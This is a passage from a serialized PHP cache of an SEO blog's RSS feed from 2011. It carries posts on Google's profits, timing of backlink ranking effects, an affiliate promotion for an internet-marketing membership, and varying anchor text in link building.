href=\"http://www.businessmba.org\">BusinessMBA.org</a><span id=\"more-9051\"></span></p>\n<h3>From Humble Beginnings to Market Dominance</h3>\n<p>Who would have thought that two college students (Sergey Brin and Larry Page) attending <a href=\"http://www.stanford.edu\">Stanford University</a> 14 years ago would create a content-devouring search engine that <strong>re-purposes crawled content</strong> (yours and mine) and then makes (others) <em>competitors or yourself</em> bid on related keywords using display / pay per click (PPC) advertising or SEO in the interests of <strong><span style=\"text-decoration: line-through;\">commercial intent </span></strong> / <strong>&#8220;relevance&#8221;</strong> would grow to such epic proportions.</p>\n<h3>Fact: “88% of online search dollars are spent on paid results, even though 85%  of searchers click on organic results”</h3>\n<p>- Vanessa Fox, “Marketing in the  Age of Google”, May 3, 2010.</p>\n<p>In closing, I believe Google is one of the most brilliant and profitable websites (that wrapped an empire around itself) ever created. But the double edge sword is, Google also has <em>their own agenda!</em></p>\n<p>At the end of the day<strong>,</strong> <strong>what will they do with their power and wealth to make the world a better place?<br />\n</strong></p>\n<p>With power comes responsibility and while Google has an 80% stake in search / market share, perhaps Google could think less about <strong>&#8220;making others conform to their terms of service&#8221;</strong> or <strong>&#8220;penalizing them&#8221;</strong> if they fail to comply and more about giving back to those whose content they are overtly <strong>&#8220;borrowing&#8221;</strong> and leveraging for the sake of profit.</p>\n<p>And a profitable market it is indeed, as we can see above&#8230; Share your thoughts below or pass this along to others if you enjoyed it.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=lnqR9zzYCuE:K3k_sSnM6Yo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/lnqR9zzYCuE\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:400:\"Here are a few tantalizing tidbits of trivia for visual types who enjoy contrast and comparison courtesy of BusinessMba.org called Google: Behind the Numbers. Aside from the glaring monetization prowess of &#8220;The Digital Juggernaut&#8221; known as Google, just remember &#8220;your clicks equate to revenue&#8221;. Let&#8217;s take a peek behind the numbers from Google&#8217;s 2010 profits [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"6\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:90:\"http://www.seodesignsolutions.com/blog/web-resources/infographic-how-profitable-is-google/\";}s:7:\"summary\";s:400:\"Here are a few tantalizing tidbits of trivia for visual types who enjoy contrast and comparison courtesy of BusinessMba.org called Google: Behind the Numbers. Aside from the glaring monetization prowess of &#8220;The Digital Juggernaut&#8221; known as Google, just remember &#8220;your clicks equate to revenue&#8221;. Let&#8217;s take a peek behind the numbers from Google&#8217;s 2010 profits [...]\";s:12:\"atom_content\";s:3140:\"<p>Here are a few tantalizing tidbits of trivia for visual types who enjoy contrast and comparison courtesy of <a href=\"http://www.businessmba.org/google-facts/\">BusinessMba.org</a> called Google: Behind the Numbers.</p>\n<p>Aside from the glaring monetization prowess of <strong>&#8220;The Digital Juggernaut&#8221;</strong> known as Google, just remember <strong>&#8220;your clicks equate to revenue&#8221;.</strong></p>\n<p>Let&#8217;s take a peek <em>behind the numbers</em> from Google&#8217;s 2010 profits to answer any questions about how profitable search as a viable business model is.</p>\n<p><a href=\"http://www.businessmba.org/google-facts/\"><img src=\"http://www.businessmba.org/google-facts/google-numbers.jpg\" border=\"0\" alt=\"Google Behind The Numbers\" width=\"500\" /></a><br />\nFrom: <a href=\"http://www.businessmba.org\">BusinessMBA.org</a><span id=\"more-9051\"></span></p>\n<h3>From Humble Beginnings to Market Dominance</h3>\n<p>Who would have thought that two college students (Sergey Brin and Larry Page) attending <a href=\"http://www.stanford.edu\">Stanford University</a> 14 years ago would create a content-devouring search engine that <strong>re-purposes crawled content</strong> (yours and mine) and then makes (others) <em>competitors or yourself</em> bid on related keywords using display / pay per click (PPC) advertising or SEO in the interests of <strong><span style=\"text-decoration: line-through;\">commercial intent </span></strong> / <strong>&#8220;relevance&#8221;</strong> would grow to such epic proportions.</p>\n<h3>Fact: “88% of online search dollars are spent on paid results, even though 85%  of searchers click on organic results”</h3>\n<p>- Vanessa Fox, “Marketing in the  Age of Google”, May 3, 2010.</p>\n<p>In closing, I believe Google is one of the most brilliant and profitable websites (that wrapped an empire around itself) ever created. But the double edge sword is, Google also has <em>their own agenda!</em></p>\n<p>At the end of the day<strong>,</strong> <strong>what will they do with their power and wealth to make the world a better place?<br />\n</strong></p>\n<p>With power comes responsibility and while Google has an 80% stake in search / market share, perhaps Google could think less about <strong>&#8220;making others conform to their terms of service&#8221;</strong> or <strong>&#8220;penalizing them&#8221;</strong> if they fail to comply and more about giving back to those whose content they are overtly <strong>&#8220;borrowing&#8221;</strong> and leveraging for the sake of profit.</p>\n<p>And a profitable market it is indeed, as we can see above&#8230; Share your thoughts below or pass this along to others if you enjoyed it.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=lnqR9zzYCuE:K3k_sSnM6Yo:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/lnqR9zzYCuE\" height=\"1\" width=\"1\"/>\";}i:23;a:12:{s:5:\"title\";s:37:\"Where Is The SEO Backlink Sweet Spot?\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/EayqR2C4Nqk/\";s:8:\"category\";s:55:\"SEOBacklink Tipping Pointlink-velocitySEO Tipping Point\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Sun, 27 Nov 2011 09:00:39 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9036\";s:7:\"content\";a:1:{s:7:\"encoded\";s:8167:\"<p>Is there such a thing in SEO as the off-page inbound link sweet spot? Meaning, finding the tipping-point for inbound links per URL, per keyword…</p>\n<div id=\"attachment_9035\" class=\"wp-caption aligncenter\" style=\"width: 434px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/where-is-the-seo-backlink-sweet-spot/\"><img class=\"size-full wp-image-9035\" title=\"finding-sweet-spot\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/finding-sweet-spot.jpg\" alt=\"\" width=\"424\" height=\"283\" /></a><p class=\"wp-caption-text\">Where is the SEO Backlink Tipping Point?</p></div>\n<p>Based on our heuristic testing, absolutely!  Just like wine, links get stronger with age – if they are supported by (a) sufficient <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">internal links</a> within the site linking out or (b) have <strong>deep links from other websites augmenting them</strong>.</p>\n<p>If properly augmented, then those pages become <strong>hub pages</strong> (pages with trust and ranking factor) which can rank additional spokes (pages) on the wheel via links.<span id=\"more-9036\"></span></p>\n<p>Internal page augmentation can be as simple as using an <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-rss-and-the-power-of-syndication/\">RSS feed</a>, syndicating a page and providing a link back to the published page.</p>\n<p>Do this with 5 RSS aggregators and you could get 5 backlinks for every page or post you create. Do this with hundreds of RSS aggregators or syndication sources and you can get hundreds of links per day (just from adding one page of content).</p>\n<p>This method is easy to implement with WordPress (if you have a content development strategy in place) to drip fresh content.</p>\n<p>Each new page or post published represents another opportunity to leverage and syndicate that content (to build links back to the original page) which can eventually sprout PageRank and pass ranking factor to your <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-landing-pages/\">preferred landing pages</a>.</p>\n<p>Those <em>link-rich</em> hub pages also double as places to build solid <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/seo-video-how-to-properly-silo-your-website/\">secondary navigation</a> or internal links to your commercial landing pages or other hub pages in your website to enhance search engine positioning.</p>\n<h3>Link Signals</h3>\n<p>One often overlooked aspect of search engine optimization is that search engines are programmed to suppress <strong>new link signals</strong> (for passing ranking factor) until they pass a certain criteria of trust.</p>\n<p>The link/trust threshold  is <strong>the secret sauce</strong> known only by a select group of developers from Google, Yahoo and Bing. The prime directive of this filter to keep their search engine indices less polluted (from aggressive link building tactics).</p>\n<p>The good news is, if you are building links properly, you can get past this filter by layering permanent one way links strategically over time.</p>\n<p>I have witnessed:</p>\n<ul>\n<li> the <em>first phase</em> at approximately <strong>10-14 days</strong> (to sprout a ranking from inbound links)</li>\n<li>the <em>second phase</em> of a the link /trust cycle is estimated at <strong>40-45 days</strong></li>\n<li>the <em>third phase</em> in the link-flow cycle typically occurs in the <strong>90-120 day</strong> range and</li>\n<li>the <em>fourth</em> <em>phase</em> occurs <strong>after 6-8 months</strong> &#8211; and continues to pass more value as time progresses.</li>\n</ul>\n<p>After the 8 month threshold, a backlink is stable and well on it&#8217;s way to gaining trust and passing along its total link flow to the target site. This suggests that as links age, they pass more ranking factor.</p>\n<p>The three primary factors that impact this algorithm are  (1) the <a href=\"http://www.seodesignsolutions.com/blog/seo/with-seo-time-and-authority-are-on-your-side/\">age/time of the link</a> and (2) the <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/seo-rankings-trust-and-relevance-signals/\">relevancy of the link</a> and (3) page strength as determined by the number of inbound / outbound links on the page providing the link.</p>\n<p>As an aspect of <a href=\"http://www.seodesignsolutions.com/blog/link-building/finding-the-right-link-velocity-to-complement-seo/\">link velocity</a>, the rate in which you gain and / or lose inbound links impacts a website, but also, the age (as mentioned above) dramatically impacts ranking.</p>\n<p>We can speculate the reason for this, but rather than look at the nuts and bolts of the algo, simply think like a developer and put yourself in the shoes of the programmers crafting the coding symphony known as Google’s search algorithm.</p>\n<p>How would you keep new links from being disruptive (if automated or otherwise) if they passed 100% ranking factor out of the gate? This would be an open invitation for automation (which could easily skew search engine result page results) from a barrage or spike of links.</p>\n<h3>Factoring The Link Grandfather Effect</h3>\n<p>The answer to this quandary, merely think of it as an algorithmic <strong>link-throttle </strong>that essentially limits how much link-juice links produce based on specific thresholds.</p>\n<p>Put simply, as links age, they pass more trust, trust translates into (a) PageRank (b) link-flow which in turn pass ranking factor along the link graph to the target page (which eventually becomes more buoyant (until it collides with the next page above it who has more relevance score) and then subsides in the search engine result pages.</p>\n<p>Aside from the off page inbound links, their age and relevancy,  typically on page factors or the degree of your on page efficiency determines how many off page inbound links are required to cross the tipping point.</p>\n<p>Each website varies based on the competition in the marketplace, the on site architecture, the volume and integrity of the internal links, the age of the site, how each page is fed in the hierarchy and <a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\">how many shingles</a> (supporting keyword occurrences) or internal links based on <a href=\"http://www.seodesignsolutions.com/blog/seo/how-semantic-connectivity-affects-seo/\">semantic overlap</a> are present.</p>\n<p>So, if you understand that it’s not always backlinks that push rankings higher, it’s capping link-loss and trust from the pre-existing inbound links or strong internal pages getting more link-flow and pushing it to the appropriate silo (preferred landing page) of the semantic theme that make this a powerful <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization-myths/on-page-off-page-seo/\">on page and off page SEO</a> combination.</p>\n<p>One quick way to give your rankings a boost is (a) build links to your links or (b) go back to published URL’s and syndicate them across multiple feeds (to get more page level citation) which in turn translates into buoyant rankings.</p>\n<p>The takeaway here is (1) use <strong>content syndication</strong> and aggregators to steadily build a stream of inbound deep links to internal pages and (2) use the collective <a href=\"http://www.seodesignsolutions.com/blog/link-building/understanding-link-prominence-volume-velocity-flow-and-distribution/\">link-weight</a> they produce to rank <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-tips-for-theming-and-siloing/\">multiple semantic themes</a> within your website.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=EayqR2C4Nqk:FT7sH1odXB0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/EayqR2C4Nqk\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:332:\"Is there such a thing in SEO as the off-page inbound link sweet spot? Meaning, finding the tipping-point for inbound links per URL, per keyword… Based on our heuristic testing, absolutely!  Just like wine, links get stronger with age – if they are supported by (a) sufficient internal links within the site linking out or [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"5\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:80:\"http://www.seodesignsolutions.com/blog/seo/where-is-the-seo-backlink-sweet-spot/\";}s:7:\"summary\";s:332:\"Is there such a thing in SEO as the off-page inbound link sweet spot? Meaning, finding the tipping-point for inbound links per URL, per keyword… Based on our heuristic testing, absolutely!  Just like wine, links get stronger with age – if they are supported by (a) sufficient internal links within the site linking out or [...]\";s:12:\"atom_content\";s:8167:\"<p>Is there such a thing in SEO as the off-page inbound link sweet spot? Meaning, finding the tipping-point for inbound links per URL, per keyword…</p>\n<div id=\"attachment_9035\" class=\"wp-caption aligncenter\" style=\"width: 434px\"><a href=\"http://www.seodesignsolutions.com/blog/seo/where-is-the-seo-backlink-sweet-spot/\"><img class=\"size-full wp-image-9035\" title=\"finding-sweet-spot\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/finding-sweet-spot.jpg\" alt=\"\" width=\"424\" height=\"283\" /></a><p class=\"wp-caption-text\">Where is the SEO Backlink Tipping Point?</p></div>\n<p>Based on our heuristic testing, absolutely!  Just like wine, links get stronger with age – if they are supported by (a) sufficient <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/why-internal-links-are-more-important-than-backlinks/\">internal links</a> within the site linking out or (b) have <strong>deep links from other websites augmenting them</strong>.</p>\n<p>If properly augmented, then those pages become <strong>hub pages</strong> (pages with trust and ranking factor) which can rank additional spokes (pages) on the wheel via links.<span id=\"more-9036\"></span></p>\n<p>Internal page augmentation can be as simple as using an <a href=\"http://www.seodesignsolutions.com/blog/seo-resources/seo-rss-and-the-power-of-syndication/\">RSS feed</a>, syndicating a page and providing a link back to the published page.</p>\n<p>Do this with 5 RSS aggregators and you could get 5 backlinks for every page or post you create. Do this with hundreds of RSS aggregators or syndication sources and you can get hundreds of links per day (just from adding one page of content).</p>\n<p>This method is easy to implement with WordPress (if you have a content development strategy in place) to drip fresh content.</p>\n<p>Each new page or post published represents another opportunity to leverage and syndicate that content (to build links back to the original page) which can eventually sprout PageRank and pass ranking factor to your <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-landing-pages/\">preferred landing pages</a>.</p>\n<p>Those <em>link-rich</em> hub pages also double as places to build solid <a href=\"http://www.seodesignsolutions.com/blog/seo-videos/seo-video-how-to-properly-silo-your-website/\">secondary navigation</a> or internal links to your commercial landing pages or other hub pages in your website to enhance search engine positioning.</p>\n<h3>Link Signals</h3>\n<p>One often overlooked aspect of search engine optimization is that search engines are programmed to suppress <strong>new link signals</strong> (for passing ranking factor) until they pass a certain criteria of trust.</p>\n<p>The link/trust threshold  is <strong>the secret sauce</strong> known only by a select group of developers from Google, Yahoo and Bing. The prime directive of this filter to keep their search engine indices less polluted (from aggressive link building tactics).</p>\n<p>The good news is, if you are building links properly, you can get past this filter by layering permanent one way links strategically over time.</p>\n<p>I have witnessed:</p>\n<ul>\n<li> the <em>first phase</em> at approximately <strong>10-14 days</strong> (to sprout a ranking from inbound links)</li>\n<li>the <em>second phase</em> of a the link /trust cycle is estimated at <strong>40-45 days</strong></li>\n<li>the <em>third phase</em> in the link-flow cycle typically occurs in the <strong>90-120 day</strong> range and</li>\n<li>the <em>fourth</em> <em>phase</em> occurs <strong>after 6-8 months</strong> &#8211; and continues to pass more value as time progresses.</li>\n</ul>\n<p>After the 8 month threshold, a backlink is stable and well on it&#8217;s way to gaining trust and passing along its total link flow to the target site. This suggests that as links age, they pass more ranking factor.</p>\n<p>The three primary factors that impact this algorithm are  (1) the <a href=\"http://www.seodesignsolutions.com/blog/seo/with-seo-time-and-authority-are-on-your-side/\">age/time of the link</a> and (2) the <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization/seo-rankings-trust-and-relevance-signals/\">relevancy of the link</a> and (3) page strength as determined by the number of inbound / outbound links on the page providing the link.</p>\n<p>As an aspect of <a href=\"http://www.seodesignsolutions.com/blog/link-building/finding-the-right-link-velocity-to-complement-seo/\">link velocity</a>, the rate in which you gain and / or lose inbound links impacts a website, but also, the age (as mentioned above) dramatically impacts ranking.</p>\n<p>We can speculate the reason for this, but rather than look at the nuts and bolts of the algo, simply think like a developer and put yourself in the shoes of the programmers crafting the coding symphony known as Google’s search algorithm.</p>\n<p>How would you keep new links from being disruptive (if automated or otherwise) if they passed 100% ranking factor out of the gate? This would be an open invitation for automation (which could easily skew search engine result page results) from a barrage or spike of links.</p>\n<h3>Factoring The Link Grandfather Effect</h3>\n<p>The answer to this quandary, merely think of it as an algorithmic <strong>link-throttle </strong>that essentially limits how much link-juice links produce based on specific thresholds.</p>\n<p>Put simply, as links age, they pass more trust, trust translates into (a) PageRank (b) link-flow which in turn pass ranking factor along the link graph to the target page (which eventually becomes more buoyant (until it collides with the next page above it who has more relevance score) and then subsides in the search engine result pages.</p>\n<p>Aside from the off page inbound links, their age and relevancy,  typically on page factors or the degree of your on page efficiency determines how many off page inbound links are required to cross the tipping point.</p>\n<p>Each website varies based on the competition in the marketplace, the on site architecture, the volume and integrity of the internal links, the age of the site, how each page is fed in the hierarchy and <a href=\"http://www.seodesignsolutions.com/blog/seo-consulting/which-links-pass-the-most-weight-in-search-engines/\">how many shingles</a> (supporting keyword occurrences) or internal links based on <a href=\"http://www.seodesignsolutions.com/blog/seo/how-semantic-connectivity-affects-seo/\">semantic overlap</a> are present.</p>\n<p>So, if you understand that it’s not always backlinks that push rankings higher, it’s capping link-loss and trust from the pre-existing inbound links or strong internal pages getting more link-flow and pushing it to the appropriate silo (preferred landing page) of the semantic theme that make this a powerful <a href=\"http://www.seodesignsolutions.com/blog/search-engine-optimization-myths/on-page-off-page-seo/\">on page and off page SEO</a> combination.</p>\n<p>One quick way to give your rankings a boost is (a) build links to your links or (b) go back to published URL’s and syndicate them across multiple feeds (to get more page level citation) which in turn translates into buoyant rankings.</p>\n<p>The takeaway here is (1) use <strong>content syndication</strong> and aggregators to steadily build a stream of inbound deep links to internal pages and (2) use the collective <a href=\"http://www.seodesignsolutions.com/blog/link-building/understanding-link-prominence-volume-velocity-flow-and-distribution/\">link-weight</a> they produce to rank <a href=\"http://www.seodesignsolutions.com/blog/seo/seo-tips-for-theming-and-siloing/\">multiple semantic themes</a> within your website.</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=EayqR2C4Nqk:FT7sH1odXB0:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/EayqR2C4Nqk\" height=\"1\" width=\"1\"/>\";}i:24;a:12:{s:5:\"title\";s:56:\"Gain Access to Michael Campbell’s Dynamic Media Vault!\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/6smTuMPoyBY/\";s:8:\"category\";s:165:\"Affiliate MarketingAccess the Internet Marketing VaultAffiliate Marketing StrategiesAffiliate Marketing TacticsAffiliate TipsMichael CampbellMichael Campbell\'s Vault\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Wed, 16 Nov 2011 07:04:57 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9026\";s:7:\"content\";a:1:{s:7:\"encoded\";s:3473:\"<p>It’s rare that I endorse anything or anyone, but there has been someone from the affiliate marketing space who has always delivered mind-shattering, truthful, no-frills advice on internet marketing time and time again. That person is Michael Campbell and today&#8217;s topic is his exclusive <strong>Dynamic Media Vault</strong>!</p>\n<div id=\"attachment_9027\" class=\"wp-caption aligncenter\" style=\"width: 337px\"><a href=\"http://www.seodesignsolutions.com/blog/affiliate-marketing/gain-access-to-michael-campbells-internet-marketing-vault/\"><img class=\"size-full wp-image-9027\" title=\"access-the-vault\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/access-the-vault.jpg\" alt=\"Michael Campbell\'s Vault\" width=\"327\" height=\"367\" /></a><p class=\"wp-caption-text\">Gain Access to the Vault!</p></div>\n<p>For a brief history lesson, Michael Campbell is a man who has been silently slaying markets online since 1988 and is either innovating evergreen methods (from <a href=\"http://www.revengeofthemininet.com/rev/\">revenge of the mininet</a>) which now applies to social media and web 2.0 properties (whereas previously it applied to how to create your own network of sites to dominate search engines) or raking in 6 to 7 figures yearly from their application.</p>\n<p>In either case, the information provided inside <strong>“The Vault”</strong> is nothing less than battle tested methods and strategies that you can use to monetize websites, CPA offers and conversion tactics, such as his free report / whitepaper on 9 proven templates, their ideal ad and content placement and which positions earned <strong>the highest click through rates</strong> using heat maps and statistical test data conducted over a 6 month sample set for the data.<span id=\"more-9026\"></span></p>\n<p>You can <strong>Download &gt;&gt;&gt;<a href=\"http://www.dynamicmedia.com/ultimate-heatmap/\">The Ultimate HeatMap Report</a>&lt;&lt;&lt; here </strong>– but to truly gain access to over 150 hours of podcasts, conversion tests, strategies, hardcore / real world tactics that you can put to work – <a href=\"http://www.dynamicmedia.com/idevaffiliate/idevaffiliate.php?id=571_2_3_4\">spend the money</a> (aff link) to become a member.</p>\n<p>It’s a one-time fee you won’t regret, and quite simply, you won’t find information like this floating around the web, since people typically keep this stuff <strong>close to the chest</strong> (and behind closed doors).</p>\n<p>Fortunately, Michael is generous and truly enjoys giving back to others. Don’t take my word for it, <a href=\"http://www.dynamicmedia.com/idevaffiliate/idevaffiliate.php?id=571&amp;url=http://www.dynamicmedia.com/register/?wlfrom=%2Frevenge%2F\">check it out for yourself</a> and you be the judge there are dozens of hour-long podcasts, useful guides and more inside the vault!</p>\n<p>Hope to see you on the inside and this truly is one tool in your <strong>internet marketing arsenal</strong> you can leverage time and time again.</p>\n<p>Enjoy!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=6smTuMPoyBY:MkhybosV-OE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/6smTuMPoyBY\" height=\"1\" width=\"1\"/>\";}s:11:\"description\";s:368:\"It’s rare that I endorse anything or anyone, but there has been someone from the affiliate marketing space who has always delivered mind-shattering, truthful, no-frills advice on internet marketing time and time again. That person is Michael Campbell and today&#8217;s topic is his exclusive Dynamic Media Vault! For a brief history lesson, Michael Campbell is [...]\";s:5:\"slash\";a:1:{s:8:\"comments\";s:1:\"1\";}s:10:\"feedburner\";a:1:{s:8:\"origlink\";s:117:\"http://www.seodesignsolutions.com/blog/affiliate-marketing/gain-access-to-michael-campbells-internet-marketing-vault/\";}s:7:\"summary\";s:368:\"It’s rare that I endorse anything or anyone, but there has been someone from the affiliate marketing space who has always delivered mind-shattering, truthful, no-frills advice on internet marketing time and time again. That person is Michael Campbell and today&#8217;s topic is his exclusive Dynamic Media Vault! For a brief history lesson, Michael Campbell is [...]\";s:12:\"atom_content\";s:3473:\"<p>It’s rare that I endorse anything or anyone, but there has been someone from the affiliate marketing space who has always delivered mind-shattering, truthful, no-frills advice on internet marketing time and time again. That person is Michael Campbell and today&#8217;s topic is his exclusive <strong>Dynamic Media Vault</strong>!</p>\n<div id=\"attachment_9027\" class=\"wp-caption aligncenter\" style=\"width: 337px\"><a href=\"http://www.seodesignsolutions.com/blog/affiliate-marketing/gain-access-to-michael-campbells-internet-marketing-vault/\"><img class=\"size-full wp-image-9027\" title=\"access-the-vault\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/access-the-vault.jpg\" alt=\"Michael Campbell\'s Vault\" width=\"327\" height=\"367\" /></a><p class=\"wp-caption-text\">Gain Access to the Vault!</p></div>\n<p>For a brief history lesson, Michael Campbell is a man who has been silently slaying markets online since 1988 and is either innovating evergreen methods (from <a href=\"http://www.revengeofthemininet.com/rev/\">revenge of the mininet</a>) which now applies to social media and web 2.0 properties (whereas previously it applied to how to create your own network of sites to dominate search engines) or raking in 6 to 7 figures yearly from their application.</p>\n<p>In either case, the information provided inside <strong>“The Vault”</strong> is nothing less than battle tested methods and strategies that you can use to monetize websites, CPA offers and conversion tactics, such as his free report / whitepaper on 9 proven templates, their ideal ad and content placement and which positions earned <strong>the highest click through rates</strong> using heat maps and statistical test data conducted over a 6 month sample set for the data.<span id=\"more-9026\"></span></p>\n<p>You can <strong>Download &gt;&gt;&gt;<a href=\"http://www.dynamicmedia.com/ultimate-heatmap/\">The Ultimate HeatMap Report</a>&lt;&lt;&lt; here </strong>– but to truly gain access to over 150 hours of podcasts, conversion tests, strategies, hardcore / real world tactics that you can put to work – <a href=\"http://www.dynamicmedia.com/idevaffiliate/idevaffiliate.php?id=571_2_3_4\">spend the money</a> (aff link) to become a member.</p>\n<p>It’s a one-time fee you won’t regret, and quite simply, you won’t find information like this floating around the web, since people typically keep this stuff <strong>close to the chest</strong> (and behind closed doors).</p>\n<p>Fortunately, Michael is generous and truly enjoys giving back to others. Don’t take my word for it, <a href=\"http://www.dynamicmedia.com/idevaffiliate/idevaffiliate.php?id=571&amp;url=http://www.dynamicmedia.com/register/?wlfrom=%2Frevenge%2F\">check it out for yourself</a> and you be the judge there are dozens of hour-long podcasts, useful guides and more inside the vault!</p>\n<p>Hope to see you on the inside and this truly is one tool in your <strong>internet marketing arsenal</strong> you can leverage time and time again.</p>\n<p>Enjoy!</p>\n<p><a href=\"https://plus.google.com/109189625824502979466/?rel=author\" rel=\"author\"> -Jeffrey</a></p><div class=\"feedflare\">\n<a href=\"http://feeds.seodesignsolutions.com/~ff/SeoDesignSolutionsBlog?a=6smTuMPoyBY:MkhybosV-OE:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/SeoDesignSolutionsBlog?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/SeoDesignSolutionsBlog/~4/6smTuMPoyBY\" height=\"1\" width=\"1\"/>\";}i:25;a:12:{s:5:\"title\";s:36:\"Should You Obfuscate Your Backlinks?\";s:4:\"link\";s:77:\"http://feeds.seodesignsolutions.com/~r/SeoDesignSolutionsBlog/~3/a1yVfIhjp24/\";s:8:\"category\";s:80:\"Link BuildingAnchor Text DiversityObfscate Inbound LinksObfuscate Internal Links\";s:2:\"dc\";a:1:{s:7:\"creator\";s:13:\"Jeffrey_Smith\";}s:7:\"pubdate\";s:29:\"Mon, 07 Nov 2011 05:10:49 PST\";s:4:\"guid\";s:46:\"http://www.seodesignsolutions.com/blog/?p=9019\";s:7:\"content\";a:1:{s:7:\"encoded\";s:6022:\"<p>Aside from enjoying using the word “<a href=\"http://en.wikipedia.org/wiki/Obfuscation\">obfuscate</a>” in a sentence, the meaning is clear for SEO when considering link building. Obfuscating links for the purpose of optimization simply means adding variety and switching things up (with your links) to avoid a pattern.</p>\n<div id=\"attachment_9020\" class=\"wp-caption aligncenter\" style=\"width: 410px\"><a href=\"http://www.seodesignsolutions.com/blog/link-building/should-you-obfuscate-your-backlinks/\"><img class=\"size-full wp-image-9020\" title=\"obfuscating-links\" src=\"http://www.seodesignsolutions.com/blog/wp-content/uploads/2011/11/obfuscating-links.jpg\" alt=\"\" width=\"400\" height=\"300\" /></a><p class=\"wp-caption-text\">Should You Obfuscate Your Links?</p></div>\n<p>In this context, the pattern is anchor text obviousness (linking to a page with the same anchor text with minimal variation). Failure to add variety to inbound or internal anchor text (links) can lead to <a href=\"http://www.seodesignsolutions.com/blog/seo/how-to-avoid-seo-over-optimization/\">over optimization</a> as a result of link velocity and how people link from the web.<span id=\"more-9019\"></span></p>\n<p>For example, if a large percentage of your backlinks are all from similar IP sources, have appeared in clusters in a timeline that seems (to good to be true), then chances are they could leave a trail that suggests that some type of <em>intentional promotion</em> / link building being done.</p>\n<p>While it is no surprise (as a capitalistic system denotes) competition can bring out the best and the worst of us. While the moral climate of promotion is questionable, it all boils down to intent. The quandary about link building (between Google and SEO) is based on the intent of the link.</p>\n<p>Their argument is, are you linking to other websites because you want to share a resource or because someone is paying you to do so? While their position on links is clear, expecting the web to conform is highly unlikely (considering what is at stake) high rankings and traffic for positions above the fold for businesses who bag the best links with ideal anchor text.</p>\n<p>Considering that links were around before search engines and links are the only thing allowing you to move from page to page and website to website about the web only validates their importance. Your interpretation of link building should be (links come in various types but if used in the right context, each type has a place) if you are using a tiered approach (to deep to discuss in this brief post).</p>\n<h3>Implementing Shingle Diversity</h3>\n<p>While there are no absolutes, merely consider these suggestions ideal guidelines for building a more robust and / or natural link 